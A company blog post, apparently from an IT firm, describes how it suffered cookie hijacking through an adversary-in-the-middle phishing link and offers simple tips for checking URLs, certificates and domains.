Here at CIBIS we pride ourselves on digital security awareness – it’s at the forefront of everything we do as evidenced by our ISO 27001 certification. Hackers and online scams are always getting more sophisticated and now they have AI to do their work for them. Even the most security conscious people can still be caught out.
We recently fell victim to a case of cookie hijacking via a malicious website link. Cookies are small pieces of data stored by your browser which say that the site you are accessing trusts you for a certain period. They are typically created when you log into a web site. You can continue to access that site until the cookie expires without having to log in again. It provides a level of convenience when you are online but comes at the cost of security. Whilst modern web browsers do a good job of keeping these cookies secure, there are always unscrupulous individuals looking for ways to get around browser security. Getting access to these cookies will effectively give a hacker the same access to a system that you have.
There are several ways for hackers to hijack cookies, but the most common one is via an Adversary in the Middle (AITM) scam. In an AITM scam, you will receive a website link that looks legitimate and when you click that link it will appear as if you are logging into a legitimate web site. And the reason it looks like a legitimate web site is because it IS the real site but it’s been passed on (or proxied) by the scam web site. This allows the fake site to capture your interactions with the legitimate site including your cookies. Once a hacker has these cookies, they can access the site (or multiple sites) as if they were you. Using a highly complex password or using multifactor authentication does not help because the cookie isn’t set until after you log in.
So how do you prevent this from happening? The only way is through vigilance. Whist there are products that will check the links that you click, they may not get updated quickly enough and hackers can generate new sites very quickly. Therefore, whenever you click a web link either in a web browser, or in an e-mail message, there are three things you can do to check the legitimacy of the link:
- Check the URL – you’ll often find that scammers try to trick you by using something similar e.g. instead of microsoft.com they’ll use microsoft-online.com or micrsoft.com– if you’re doubtful don’t click it.
- If you click the URL, check the certificate of the site. If it doesn’t have a certificate leave the site immediately. Often the certificate will have the name of the company it was issued to (although this is not required) e.g:
- Use Google or another search engine to find the company and see if the domain matches the one you are accessing. Search engines are good at removing scam sites based on their algorithms.
None of these suggestions are foolproof however, so vigilance is the only real antidote to these scams. The internet has become such a ubiquitous part of our daily lives that it’s easy to fall victim to one of these scams especially when the link seems to come from someone you trust. So stay alert and aware when you’re online – especially when it comes to entering your user name and password.